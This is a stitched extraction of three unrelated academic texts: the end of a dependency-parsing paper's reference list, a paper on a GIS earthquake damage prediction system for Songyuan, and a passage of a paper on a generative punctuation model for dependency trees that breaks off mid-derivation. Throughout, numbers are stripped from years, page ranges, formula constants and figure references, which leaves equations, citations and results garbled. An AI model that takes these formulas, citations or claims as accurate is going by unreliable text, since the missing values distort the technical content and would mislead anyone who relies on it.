linguis- tics (naacl hlt), pages – . yoav goldberg and joakim nivre. . a dynamic or- acle for arc-eager dependency parsing. in proceed- ings of the th international conference on compu- tational linguistics (coling), pages – . he he, hal daumé iii, and jason eisner. . imitation learning by coaching. in advances in neural informa- tion processing systems . liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . marco kuhlmann, carlos gómez-rodrı́guez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . andré filipe martins, dipanjan das, noah a. smith, and eric p. xing. . stacking dependency parsers. in proceedings of the conference on empirical meth- ods in natural language processing (emnlp), pages – . ryan mcdonald and joakim nivre. . charac- terizing the errors of data-driven dependency parsing models. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp-conll), pages – . ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meeting of the association for computational linguistics (acl), pages – . joakim nivre and ryan mcdonald. . integrating graph-based and transition-based dependency parsers. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . joakim nivre. . an efficient algorithm for pro- jective dependency parsing. in proceedings of the th international workshop on parsing technologies (iwpt), pages – . joakim nivre. . incrementality in deterministic de- pendency parsing. in proceedings of the workshop on incremental parsing: bringing engineering and cog- nition together (acl), pages – . joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguis- tics, : – . stéphane ross and j. andrew bagnell. . efficient reductions for imitation learning. in proceedings of the th international conference on artificial intelli- gence and statistics, pages – . stéphane ross, geoffrey j. gordon, and j. andrew bag- nell. . a reduction of imitation learning and structured prediction to no-regret online learning. in proceedings of the th international conference on artificial intelligence and statistics, pages – . andreas vlachos. . an investigation of imitation learning algorithms for structured prediction. in pro- ceedings of the european workshop on reinforcement learning (ewrl), pages – . yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) earthquake damage predicting system of songyuan based on gis su zhenjiang institute of disaster prevention the gis association of institution of disaster prevention beijing, china e-mail: @qq.com huang meng* institute of disaster prevention the gis association of institution of disaster prevention beijing, china e-mail: @qq.com xie shaohui institute of disaster prevention the gis association of institution of disaster prevention beijing, china e-mail: @qq.com zhang dian institute of disaster prevention the gis association of institution of disaster prevention beijing, china e-mail: @qq.com wang zhe institute of disaster prevention the gis association of institution of disaster prevention beijing, china e-mail: @qq.com abstract—with the rapid development of cities, the research on urban seismic damage prediction should have a breakthrough based on the modern technology. the paper takes songyuan of jilin province as the research object, and creates a spatial database by field data and baidu maps. we simulate the earthquake by using the seismic intensity algorithm of the point source and the line source, use the spatial analysis method of php+gis to simulate the influence at different earthquake levels on the urban buildings in songyuan. at the same time, php, html and dynamic cutting technique were used to evaluate the disaster in minutes after the earthquake. this system will provide technical support for the prevention of earthquake damage in songyuan. keywords-earthquake damage prediction; songyuan; baidu maps api; rapid assessment i. introduction with the rapid development of chinese economy and the urbanization process, more and more attention is supposed to be put on the potential threat of earthquakes to people's lives and property. if we can use gis technology to simulate the loss may be caused by the earthquake to the city before the disaster, and estimate the severe disaster area to shrink the scope of rescue, it will provide the management decision- making institutions with reliable technical support. therefore, it is very meaningful to develop a gis-based earthquake seismic hazard prediction system. gis technology, with its intuitive characteristics, is widely used in various fields. for example, in , professor yuan longbo of the school of civil and hydraulic engineering of dalian university of technology made an earthquake predicting system of urban lifeline based on gis, which made a rational analysis of the influence of urban pipe network connectivity and damage on pipe network, but it didn’t comprehensively discuss the influence of pipeline network on urban buildings. in , zhao qi, a director of the structural engineering and disaster prevention research institute of tongji university, made a study on application of high resolution remote sensing images in rapid prediction of earthquake disaster in urban area. this technology adapts to the needs of large-scale regional earthquake damage prediction work, but because remote sensing satellites cannot provide real-time image, the project cannot meet the requirements of post-earthquake rapid assessment. in , wang dongming, a researcher at the china earthquake prevention center, made a research on urban earthquake damage prediction virtual simulation system. professor wang adopted the city simulation based on vr technology, but the whole development cost is high, which is not conducive to promotion. in , xiao xinghui, a teacher of china ocean university, made a prediction model of urban bridge seismic damage based on least squares support vector machine, which is mainly aimed at the study of urban bridges, but didn’t study the seismic modeling of urban buildings. to summary, although many researchers have made different directions for urban earthquake damage prediction, but for the rapid assessment of urban construction disaster is still left blank. therefore, the paper, through the study on earthquake damage prediction and the feasibility of software implementation, has developed an earthquake intensity model software aimed at songyuan, jilin province, and it also is a platform for analysis that can be combined with multiple factors to give disaster assessment and rescue information. international conference on sensor network and computer engineering (icsnce ) ii. system design a. design of systematic framework figure . functional structure diagram figure . technical flow chart b. database the correctness of the prediction results of the earthquake predicting system in songyuan depends on the reliability of the data source. this project lasted more than a year, we carried out comprehensive field survey and data collection of more than buildings located at ningjiang district, fuyu city, qian'an county, changling county and ross mongolian autonomous county in songyuan, which finally collected about thousand complete messages. the coordinate system in map is beijing coordinate system, and the coordinates of building are shp format data through the field research. the map component is used baidu maps interface. because its own coordinates, we need a coordinate conversion. there are many methods for coordinate conversion, and this system uses recursive callback method requesting api for batch processing of coordinate data. many articles are described in detail about the method, so we don't go into details. another place to be pretreated is the vulnerability of building structures to different seismic grades. for this point, the paper draws on the study of the seismic performance of buildings by yi qian researcher, carries out the prediction examples based on the damage of shenyang and wuhan city, combined with the data of the existing foundation, and uses the vulnerability of building structures to earthquake disaster prediction science describing failure degree of building and loss of the city under different intensity earthquake damage. the specific algorithm is as follows: vulnerability of the building structure is the probability or possibility of a certain degree of damage occurring under the determined earthquake intensity. china earthquake intensity table to the building's damage level is divided into basic intact, minor damage, moderate damage, serious damage and destruction of five grades. the researchers divided our buildings into four categories according to the vulnerability level. class a mainly includes multi-storey steel and reinforced concrete structures, and the seismic capacity is the best. class b mainly includes brick structure, industrial building and the seismic capacity is inferior to class a; class c mainly includes without formal design, open brick structure; d class for the soil structure, is the worst type of earthquake resistance. ( ) in the formula, vid is the structural vulnerability index, it is the seismic damage matrix of building, i means the seismic intensity, dj means the damage level of the house, it is the damage rate of the house when the j damage occurs. the smaller the vulnerability index is, the better the seismic capacity of structure is, and the smaller the earthquake loss is. this project combines the historical seismic damage statistics method and test method, through the collection of buildings under different intensities of damage degree of seismic data in recent years, the analysis of the vulnerability of different types of buildings, combined with the test method to simulate the specific building and the corresponding experimental results and got the intensity of vulnerability index, then fitting out the fragility curves of all kinds of buildings. for example, the project survey in ningjiang district of songyuan city is a high-rise concrete building, according to the fragility curves of the building. the building is estimated at six level showed a good intensity, showing good intensity at level seven, damaged in eight level intensity, in nine levels of intensity is moderate international conference on sensor network and computer engineering (icsnce ) damage, severe in the ten stage damage intensity. part of the field of the building database is shown in figure : figure . schematic diagram of database vulnerability c. database design database plays an important role in the system platform, so it is very important to design a reasonable database structure. the population, economic and geographical data from different data source formats such as txt text format, excle format, and shp format, we need to provide for different kinds of data sources in the database data entry interface. at the same time, when the database is built, the data redundancy and the feasibility of the later maintenance are also need to be considered. through several design schemes, the relational database scheme with the building number as the unique identifier and the multi table association is adopted. table i. the main field and description field table field name explanation buildingnumber primary key column, used for field matching, multi-table joint query x y actual coordinates, through the actual investigation baidu_x baidu_y baidu coordinates, through the actual coordinates of the building coordinates obtained after conversion propertytype building type, used to screen different types of buildings nameofhous head of household name constructionage building age sixdegrearthdam sevendegrearthdam eightdegrearthdam ninedegrearthdam tendegrearthdam building vulnerability level, damage degree of housing at different intensity levels this project implements the data import interface for different data sources, and add the relevant attribute information according to the building number to dynamically. taking into account the late housing information replacement, this project provides an interface for dynamically modifying updated data. with this kind of interface, all data can be updated in real time. iii. styling system implementation this paper is based on the point set and line set data from songyuan city survey, using baidu map to display the building information and lifeline engineering in songyuan. the seismic intensity model of point source and line source is used to simulate the earthquake, and the earthquake disaster and building damage are evaluated automatically. user can export the result to the document and export the relevant word document according to the requirement. here we will make a preliminary demonstration of the key functional algorithm ideas: a. elliptic intensity attenuation method in the work of seismic safety evaluation, earthquake zoning and post-earthquake rapid assessment, as an important indicator of earthquake motion, the attenuation relation and law of earthquake intensity have obvious regionality. because of the typical plain landform of songyuan city and a lot of very mature elliptical intensity attenuation research, the paper adopts the intensity attenuation relation of line source earthquake in north china proposed by sha haijun as the attenuation model of songyuan intensity. ) . ln( . . . . ) . ln( . . . . ' s ' l   rmmi rmmi )( )( ( ) in this formula, the variable i represents the intensity, the variable m means the magnitude, and r represents the epicenter distance (km), the lower corner of the standard l, s represents the long and short axis. the difficulty of this project is the combination of elliptical intensity attenuation method and baidu map to truly achieve the simulation of ellipse intensity on map. for this reason, we abstracted it as a mathematical model to achieve. f(x,q,r,y,z)= is a set of points, f is the input set, x is the coordinate point of the focal position, q is the strong earthquake action, r is the epicentral distance, y is the deflection angle under the action of the fault zone, z is the output set. then the model is rewritten into a computer language and implemented with a class, and the coordinates of all points on the intensity map are obtained. simulation of a . earthquake occurred, according to the long and short axis intensity attenuation algorithm effect shown in figure . figure . longitudinal axis elliptical intensity attenuation method in contrast, the circular intensity attenuation method is relatively simple to implement based on the ellipse. the circular model assumes that the seismic source is a point source, ignoring the effect of seismic fault rupture on ground motion, and the seismic intensity decreases with increasing epicentral distance. as matsubara is located in the plains, according to the empirical formula of earthquake attenuation, i = m + where i is the intensity of the earthquake and m is the magnitude. in general, the higher the intensity of attenuation, the faster the decay of degrees to degrees international conference on sensor network and computer engineering (icsnce ) after km or so, followed by degrees to degrees after km, degrees to degrees after km, degrees to degrees to go through km or so. according to this model, the intensity attenuation diagram of an earthquake can be dynamically generated by controlling the radius of the circular intensity circle at all levels. simulation of the occurrence of a earthquake and according to the disaster situation will be severely affected buildings automatically grouped the effect shown in figure . figure . circular intensity attenuation method in addition, our system has also realized the function of earthquake damage prediction for lifeline engineering, and the multi layer analysis with the overlay of the building layer. the effect is shown in figure . figure . damage prediction for lifeline engineering b. document export document export is a key part of the evaluation system, the user can then manipulate the system to obtain automatically generated documents and data from the composition of the document, which to a large extent save the time to artificially export data. this project uses the phpword class library to complete the requirements for generating documents and formats. and designs the delay module by several dynamic statistics, combined with h latest technology dynamic capture window real-time capture analysis results, finally can be saved in the cache folder. because the thinkphp framework does not provide support for the direct operation of microsoft word and powerpoint, then we change our mind in the windows environment. this project starts by modifying the php configuration file php.ini to start the support of php zip, thus gaining the phpword class library . . - version, and extending the support for ms word and powerpoint. because the phpword class library is a class library edited abroad, there still exists the problem of chinese garbled code. it will translate the input text into utf _ encode code. that is to say, using gbk, gb or utf code will appear garbled situation, so we use utf encoding. at the same time, we find the utf _encode transcoding in all the methods in the class library, delete them, and use iconv to encode the gbk or gbk code, which can solve the problem better. there are pictures produced in the word document, namely the intensity circle map of the earthquake area, the distribution map of the destruction of the houses in the earthquake area, the pie charts of the houses damaged in the earthquake area, the column of the destruction of the houses in the earthquake area and the architectural situation in the city. each picture is waiting for the page finishes loading through the delay module, real-time dynamic crawl on the window with screenshots of components, and then gain access to the data stream to the interception time to distinguish cached in the corresponding folder. when exporting, we read the cache file, and we insert the picture through the function called addimage. the module can quickly export the electronic documents of damaged buildings after earthquake simulation, and reduce the occupation of computer memory resources by using cache, which has the characteristics of flexibility and portability. the seismic damage prediction results of figure are derived by using word, which is shown in figure : figure . export the document part of the schematic iv. conclusion this paper is based on the theory of earthquake damage prediction for the terrain of songyuan, cleverly combines a variety of methods such as seismic intensity algorithm for point source and line source, php + gis spatial analysis method, php + html + dynamic cutting technology, to apply gis theory to the actual development needs. it’s different from the previous urban earthquake damage prediction system, and the system data sources are more comprehensive and reliable. in the calculation of data processing in this system, the results have been collated in the form of presenting qualified documents, which is very convenient to the user's operation. the system also has room for upgrading, and it is expected to continue to increase the function module of casualties statistics, so as to make the system function more perfect. the implementation of the project is based on its rapid exporting of derived products within minutes, which make up for the current earthquake industry in the post earthquake rapid assessment of the blank. the system provides a powerful scientific basis for improving the ability international conference on sensor network and computer engineering (icsnce ) of urban earthquake prevention and disaster reduction by revealing the weak links of urban building earthquake. at the same time, it also provides some technical support for earthquake damage prediction in songyuan. acknowledgments this work was supported by the special fund of fundamental scientific research business expense for higher school of central government (no. zy ). references [ ] yuan yongbo, bai guangbin, zhang mingyuan. gis based prediction system for earthquake damage of urban lifelines liaoning university of technology and technology (natural science edition, december ) technology based on gis in changchun city earthquake damage prediction technology - [ ] zhao qi, zhai yong-mei, li tiezheng application of high-resolution remote sensing image in urban rapid earthquake damage prediction [j]. software journal, , - - [ ] wang dongming, study on virtual simulation system of urban earthquake damage prediction [j]. china earthquake disaster prevention center, , - - [ ] zhang yu, kang jianhong, wei meixuan, li na, yang qing, study on prediction model of earthquake damage of urban bridge based on least squares support vector machine. geophysical and geochemical exploration, , ( ); - - [ ] wu qing, gao mengtan. study on historical earthquake magnitude and epicenter using elliptical intensity attenuation relationship [j]. institute of geophysics, china earthquake administration, , : - . transactions of the association for computational linguistics, vol. , pp. – , . action editor: trevor cohn. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. a generative model for punctuation in dependency trees xiang lisa li⇤ and dingquan wang⇤ and jason eisner department of computer science, johns hopkins university xli @jhu.edu, {wdd,jason}@cs.jhu.edu abstract treebanks traditionally treat punctuation marks as ordinary words, but linguists have suggested that a tree’s “true” punctuation marks are not observed (nunberg, ). these latent “underlying” marks serve to delimit or separate constituents in the syn- tax tree. when the tree’s yield is rendered as a written sentence, a string rewriting mech- anism transduces the underlying marks into “surface” marks, which are part of the ob- served (surface) string but should not be re- garded as part of the tree. we formalize this idea in a generative model of punc- tuation that admits efficient dynamic pro- gramming. we train it without observing the underlying marks, by locally maximiz- ing the incomplete data likelihood (simi- larly to the em algorithm). when we use the trained model to reconstruct the tree’s underlying punctuation, the results appear plausible across languages, and in par- ticular are consistent with nunberg’s anal- ysis of english. we show that our gener- ative model can be used to beat baselines on punctuation restoration. also, our recon- struction of a sentence’s underlying punctu- ation lets us appropriately render the surface punctuation (via our trained underlying-to- surface mechanism) when we syntactically transform the sentence. introduction punctuation enriches the expressiveness of writ- ten language. when converting from spoken to written language, punctuation indicates pauses or pitches; expresses propositional attitude; and is conventionally associated with certain syntactic constructions such as apposition, parenthesis, quo- tation, and conjunction. in this paper, we present a latent-variable model of punctuation usage, inspired by the rule- based approach to english punctuation of nun- berg ( ). training our model on english data ⇤equal contribution. learns rules that are consistent with nunberg’s hand-crafted rules. our system is automatic, so we use it to obtain rules for arabic, chinese, spanish, and hindi as well. moreover, our rules are stochastic, which al- lows us to reason probabilistically about ambigu- ous or missing punctuation. across the lan- guages, our model predicts surface punctuation better than baselines, as measured both by per- plexity (§ ) and by accuracy on a punctuation restoration task (§ . ). we also use our model to correct the punctuation of non-native writers of english (§ . ), and to maintain natural punc- tuation style when syntactically transforming en- glish sentences (§ . ). in principle, our model could also be used within a generative parser, al- lowing the parser to evaluate whether a candidate tree truly explains the punctuation observed in the input sentence (§ ). punctuation is interesting in the linguistics of punctuation, nunberg ( ) argues that punctu- ation (in english) is more than a visual counter- part of spoken-language prosody, but forms a lin- guistic system that involves “interactions of point indicators (i.e. commas, semicolons, colons, pe- riods and dashes).” he proposes that much as in phonology (chomsky and halle, ), a gram- mar generates underlying punctuation which then transforms into the observed surface punctuation. consider generating a sentence from a syntactic grammar as follows: hail the king [, arthur pendragon ,] [, who wields [ “ excalibur ” ] ,] . although the full tree is not depicted here, some of the constituents are indicated with brackets. in this underlying generated tree, each appositive np is surrounded by commas. on the surface, however, the two adjacent commas after pendragon will now be collapsed into one, and the final comma will be absorbed into the adjacent period. fur- thermore, in american english, the typographic downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april convention is to move the final punctuation inside the quotation marks. thus a reader sees only this modified surface form of the sentence: hail the king, arthur pendragon, who wields “excalibur.” note that these modifications are string transfor- mations that do not see or change the tree. the resulting surface punctuation marks may be clues to the parse tree, but (contrary to nlp convention) they should not be included as nodes in the parse tree. only the underlying marks play that role. punctuation is meaningful pang et al. ( ) use question and exclamation marks as clues to sentiment. similarly, quotation marks may be used to mark titles, quotations, reported speech, or dubious terminology (university of chicago, ). because of examples like this, methods for determining the similarity or meaning of syntax trees, such as a tree kernel (agarwal et al., ) or a recursive neural network (tai et al., ), should ideally be able to consider where the un- derlying punctuation marks attach. punctuation is helpful surface punctuation re- mains correlated with syntactic phrase structure. nlp systems for generating or editing text must be able to deploy surface punctuation as human writ- ers do. parsers and grammar induction systems benefit from the presence of surface punctuation marks (jones, ; spitkovsky et al., ). it is plausible that they could do better with a linguisti- cally informed model that explains exactly why the surface punctuation appears where it does. pat- terns of punctuation usage can also help identify the writer’s native language (markov et al., ). punctuation is neglected work on syntax and parsing tends to treat punctuation as an af- terthought rather than a phenomenon governed by its own linguistic principles. treebank annota- tion guidelines for punctuation tend to adopt sim- ple heuristics like “attach to the highest possi- ble node that preserves projectivity” (bies et al., ; nivre et al., ). many dependency parsing works exclude punctuation from evalua- tion (nivre et al., b; koo and collins, ; chen and manning, ; lei et al., ; kiper- wasser and goldberg, ), although some others retain punctuation (nivre et al., a; goldberg and elhadad, ; dozat and manning, ). http://universaldependencies.org/u/ dep/punct.html unpunctuated tree: t dale means river valley rootnsubj dobj attach tree: t underlying sequence: u sentence: ū surface sentence: x̄sequence: x noisychannel u u u u u x x x x x “ dale ” means “ river valley ” . “ dale ” means “ river valley . ” root. nsubj“ ” dobj“ ” figure : the generative story of a sentence. given an unpunctuated tree t at top, at each node w t , the attach process stochastically attaches a left puncteme l and a right puncteme r, which may be empty. the resulting tree t has underlying punctua- tion u. each slot’s punctuation ui u is rewritten to xi x by noisychannel. in tasks such as word embedding induction (mikolov et al., ; pennington et al., ) and machine translation (zens et al., ), punctua- tion marks are usually either removed or treated as ordinary words (řehůřek and sojka, ). yet to us, building a parse tree on a surface sentence seems as inappropriate as morphologi- cally segmenting a surface word. in both cases, one should instead analyze the latent underlying form, jointly with recovering that form. for exam- ple, the proper segmentation of english hoping is not hop-ing but hope-ing (with underlying e), and the proper segmentation of stopping is neither stopp-ing nor stop-ping but stop-ing (with only one underlying p). cot- terell et al. ( , ) get this right for morphol- ogy. we attempt to do the same for punctuation. formal model we propose a probabilistic generative model of sentences (figure ): p(x̄) = p t,t psyn(t) · p✓(t |t) · p�(x̄|ū(t )) ( ) first, an unpunctuated dependency tree t is stochastically generated by some recursive pro- cess psyn (e.g., eisner, , model c). second, each constituent (i.e., dependency subtree) sprouts optional underlying punctuation at its left and right edges, according to a probability distribution p✓ that depends on the constituent’s syntactic role (e.g., dobj for “direct object”). this punctuated tree t yields the underlying string ū = ū(t ), which is edited by a finite-state noisy channel p� to arrive at the surface sentence x̄. our model could be easily adapted to work on con- stituency trees instead. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://universaldependencies.org/u/dep/punct.html http://universaldependencies.org/u/dep/punct.html this third step may alter the sequence of punc- tuation tokens at each slot between words—for ex- ample, in § , collapsing the double comma , , between pendragon and who. u and x denote just the punctuation at the slots of ū and x̄ respec- tively, with ui and xi denoting the punctuation to- ken sequences at the ith slot. thus, the transfor- mation at the ith slot is ui ! xi. since this model is generative, we could train it without any supervision to explain the observed surface string x̄: maximize the likelihood p(x̄) in ( ), marginalizing out the possible t, t values. in the present paper, however, we exploit known t values (as observed in the “depunctuated” ver- sion of a treebank). because t is observed, we can jointly train ✓, � to maximize just p(x | t) = x t p✓(t | t) · p�(x | u(t )) ( ) that is, the psyn model that generated t be- comes irrelevant, but we still try to predict what surface punctuation will be added to t . we still marginalize over the underlying punctuation marks u. these are never observed, but they must explain the surface punctuation marks x (§ . ), and they must be explained in turn by the syntax tree t (§ . ). the trained generative model then lets us restore or correct punctuation in new trees t (§ ). . generating underlying punctuation the attach model characterizes the probability of an underlying punctuated tree t given its cor- responding unpunctuated tree t , which is given by p✓(t | t) = y w t p✓(lw, rw | w) ( ) where lw, rw v are the left and right punctemes that t attaches to the tree node w. each puncteme (krahn, ) in the finite set v is a string of or more underlying punctuation tokens. the proba- bility p✓(l, r | w) is given by a log-linear model multi-token punctemes are occasionally useful. for ex- ample, the puncteme ... might consist of either or to- kens, depending on how the tokenizer works; similarly, the puncteme ?! might consist of or tokens. also, if a sin- gle constituent of t gets surrounded by both parentheses and quotation marks, this gives rise to punctemes (“ and ”). (a better treatment would add the parentheses as a separate puncteme pair at a unary node above the quotation marks, but that would have required t to introduce this extra node.) . point absorption . period absorption „ !, ,. !. -, !- .? !? .! !! -; !; ;. !. abbv. !abbv . quote transposition . bracket absorptions ”, !,” ”. !.” ,) !) -) !) (, !( ,” !” “, !“ table : some of nunberg’s punctuation interaction rules in english, in priority order. the absorption rules ensure that when there are two adjacent tokens, the “weaker” one is deleted (where the strength ordering is {?, !, (, ), “, ”} > . > {;, :} > - > ,), except that bracketing tokens such as () and “” do not absorb tokens outside the material they bracket. p✓(l, r|w) / ( exp ✓>f(l, r, w) if (l, r) wd(w) otherwise ( ) where v is the finite set of possible punctemes and wd ✓ v gives the possible puncteme pairs for a node w that has dependency relation d = d(w) to its parent. v and wd are estimated heuristically from the tokenized surface data (§ ). f(l, r, w) is a sparse binary feature vector, and ✓ is the cor- responding parameter vector of feature weights. the feature templates in appendix a consider the symmetry between l and r, and their compatibility with (a) the pos tag of w’s head word, (b) the de- pendency paths connecting w to its children and the root of t , (c) the pos tags of the words flank- ing the slots containing l and r, (d) surface punc- tuation already added to w’s subconstituents. . from underlying to surface from the tree t , we can read off the sequence of underlying punctuation tokens ui at each slot i between words. namely, ui concatenates the right punctemes of all constituents ending at i with the left punctemes of all constituents starting at i (as illustrated by the examples in § and figure ). the noisychannel model then transduces ui to a surface token sequence xi, for each i = , . . . , n independently (where n is the sentence length). nunberg’s formalism much like chomsky and halle’s ( ) phonological grammar of english, nunberg’s ( ) descriptive english punctuation grammar (table ) can be viewed computationally as a priority string rewriting system, or markov algorithm (markov, ; caracciolo di forino, ). the system begins with a token string u. the appendices (supplementary material) are available at https://arxiv.org/abs/ . . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . https://arxiv.org/abs/ . abcde . ab ! ab abcde . bc ! b a bde . bd ! db a dbe . be ! e a d e figure : editing abcde ! ade with a sliding win- dow. (when an absorption rule maps tokens to , our diagram leaves blank space that is not part of the out- put string.) at each step, the left-to-right process has already committed to the green tokens as output; has not yet looked at the blue input tokens; and is currently considering how to (further) rewrite the black tokens. the right column shows the chosen edit. at each step it selects the highest-priority local rewrite rule that can apply, and applies it as far left as possible. when no more rules can apply, the final state of the string is returned as x. simplifying the formalism markov algorithms are turing complete. fortunately, johnson ( ) noted that in practice, phonological u ! x maps described in this formalism can usually be imple- mented with finite-state transducers (fsts). for computational simplicity, we will formu- late our punctuation model as a probabilistic fst (pfst)—a locally normalized left-to-right rewrite model (cotterell et al., ). the probabilities for each language must be learned, using gradient descent. normally we expect most probabilities to be near or , making the pfst nearly determin- istic (i.e., close to a subsequential fst). however, permitting low-probability choices remains useful to account for typographical errors, dialectal dif- ferences, and free variation in the training corpus. our pfst generates a surface string, but the invertibility of fsts will allow us to work back- wards when analyzing a surface string (§ ). a sliding-window model instead of having rule priorities, we apply nunberg-style rules within a -token window that slides over u in a single left- to-right pass (figure ). conditioned on the cur- rent window contents ab, a single edit is selected stochastically: either ab !ab (no change), ab !b (left absorption), ab ! a (right absorption), or ab ! ba (transposition). then the window slides rightward to cover the next input token, together with the token that is (now) to its left. a and b are always real tokens, never boundary symbols. � specifies the conditional edit probabilities. rather than learn a separate edit probability distribution for each bigram ab, one could share parameters across bi- grams. for example, table ’s caption says that “stronger” tokens tend to absorb “weaker” ones. a model that incor- these specific edit rules (like nunberg’s) can- not insert new symbols, nor can they delete all of the underlying symbols. thus, surface xi is a good clue to ui: all of its tokens must appear underly- ingly, and if xi = ✏ (the empty string) then ui = ✏. the model can be directly implemented as a pfst (appendix d ) using cotterell et al.’s ( ) more general pfst construction. our single-pass formalism is less expressive than nunberg’s. it greedily makes decisions based on at most one token of right context (“label bias”). it cannot rewrite ’”. !.’” or ”,. !.” because the . is encountered too late to percolate leftward; luckily, though, we can handle such en- glish examples by sliding the window right-to-left instead of left-to-right. we treat the sliding direc- tion as a language-specific parameter. . training objective building on equation ( ), we train ✓, � to lo- cally maximize the regularized conditional log- likelihood ⇣ x x,t log p(x | t)� ⇠ · e t [c(t )] ⌘ � & · ||✓|| ( ) where the sum is over a training treebank. the expectation e[· · · ] is over t ⇠ p(· | t, x). this generalized expectation term pro- vides posterior regularization (mann and mccal- lum, ; ganchev et al., ), by encourag- ing parameters that reconstruct trees t that use symmetric punctuation marks in a “typical” way. the function c(t ) counts the nodes in t whose punctemes contain “unmatched” symmetric punc- tuation tokens: for example, ) is “matched” only when it appears in a right puncteme with ( at the comparable position in the same constituent’s left puncteme. the precise definition is given in ap- pendix b. porated this insight would not have to learn o(|⌃| ) separate absorption probabilities (two per bigram ab), but only o(|⌃|) strengths (one per unigram a, which may be regarded as a -dimensional embedding of the punctuation token a). we figured that the punctuation vocabulary ⌃ was small enough (table ) that we could manage without the additional com- plexity of embeddings or other featurization, although this does presumably hurt our generalization to rare bigrams. we could have handled all languages uniformly by mak- ing � passes of the sliding window (via a composition of � pfsts), with at least one pass in each direction. in retrospect, there was no good reason to square the et [c(t )] term. however, when we started redoing the ex- periments, we found the results essentially unchanged. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . in our development experiments on english, the posterior regularization term was necessary to dis- cover an aesthetically appealing theory of under- lying punctuation. when we dropped this term (⇠ = ) and simply maximized the ordinary regu- larized likelihood, we found that the optimization problem was underconstrained: different training runs would arrive at different, rather arbitrary un- derlying punctemes. for example, one training run learned an attach model that used underlying “. to terminate sentences, along with a noisy- channel model that absorbed the left quotation mark into the period. by encouraging the under- lying punctuation to be symmetric, we broke the ties. we also tried making this a hard constraint (⇠ = ), but then the model was unable to explain some of the training sentences at all, giving them probability of . for example, i went to the “ special place ” cannot be explained, be- cause special place is not a constituent. inference in principle, working with the model ( ) is straightforward, thanks to the closure properties of formal languages. provided that psyn can be en- coded as a weighted cfg, it can be composed with the weighted tree transducer p✓ and the weighted fst p� to yield a new weighted cfg (similarly to bar-hillel et al., ; nederhof and satta, ). under this new grammar, one can recover the opti- mal t, t for x̄ by dynamic programming, or sum over t, t by the inside algorithm to get the likeli- hood p(x̄). a similar approach was used by levy ( ) with a different fst noisy channel. in this paper we assume that t is observed, al- lowing us to work with equation ( ). this cuts the computation time from o(n ) to o(n). whereas the inside algorithm for ( ) must consider o(n ) possible constituents of x̄ and o(n) ways of build- ing each, our algorithm for ( ) only needs to iterate over the o(n) true constituents of t and the true way of building each. however, it must still con- sider the |wd| puncteme pairs for each constituent. recall that the noisychannel model family (§ . ) requires the surface “ before special to appear under- lyingly, and also requires the surface ✏ after special to be empty underlyingly. these hard constraints clash with the ⇠ = hard constraint that the punctuation around special must be balanced. the surface ” after place causes a similar problem: no edge can generate the match- ing underlying “. we do o(n) multiplications of n ⇥ n matrices where algorithm the algorithm for scoring a given (t, x) pair. the code in blue is used during train- ing to get the posterior regularization term in ( ). input: t , x . training pair (omits t , u) output: p(x | t), e[c(t )] : procedure totalscore(t , x) : for i = to n do : compute wfsa (mi, �i, ⇢i) : e . exp. count of unmatched punctemes : procedure in(w) . w t : i, k slots at left, right of w constit : j slot at right of w headword : mleft ( q w leftkids(w) in(w ))⇢j� : mright �>j ( q w rightkids(w) in(w )) : m mleft · · mright . rnj⇥ , r ⇥nj : m . rni⇥nk : for (l, r) wd(w) do : p p✓(l, r | w) : m m + p · mi(l)m mk(r) : e e + p · l,r have unmatched punc : return m . rni⇥nk : mroot in(root(t)) : return �> mroot⇢n, e . r, r . algorithms given an input sentence x̄ of length n, our job is to sum over possible trees t that are consistent with t and x̄, or to find the best such t . this is roughly a lattice parsing problem—made easier by knowing t . however, the possible ū values are characterized not by a lattice but by a cyclic wfsa (as |ui| is unbounded whenever |xi| > ). for each slot  i  n, transduce the sur- face punctuation string xi by the inverted pfst for p� to obtain a weighted finite-state automa- ton (wfsa) that describes all possible underly- ing strings ui. this wfsa accepts each pos- sible ui with weight p�(xi | ui). if it has ni states, we can represent it (berstel and reutenauer, ) with a family of sparse weight matrices mi(�) rni⇥ni , whose element at row s and column t is the weight of the s ! t arc labeled with �, or if there is no such arc. additional vectors �i, ⇢i rni specify the initial and final weights. (�i is one-hot if the pfst has a single n = o(# of punc types · max # of punc tokens per slot). constructively, compose the u-to-x pfst (from the end of § . ) with a straight-line fsa accepting only xi, and project the resulting wfst to its input tape (pereira and ri- ley, ), as explained at the end of appendix d. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . initial state, of weight .) for any puncteme l (or r) in v, we define mi(l) = mi(l )mi(l ) · · · mi(l|l|), a product over the or more tokens in l. this gives the total weight of all s !⇤ t wfsa paths labeled with l. the subprocedure in algorithm essentially extends this to obtain a new matrix in(w) rni⇥nk , where the subtree rooted at w stretches from slot i to slot k. its element in(w)st gives the total weight of all extended paths in the ū wfsa from state s at slot i to state t at slot k. an extended path is defined by a choice of underly- ing punctemes at w and all its descendants. these punctemes determine an s-to-final path at i, then initial-to-final paths at i+ through k� , then an initial-to-t path at k. the weight of the extended path is 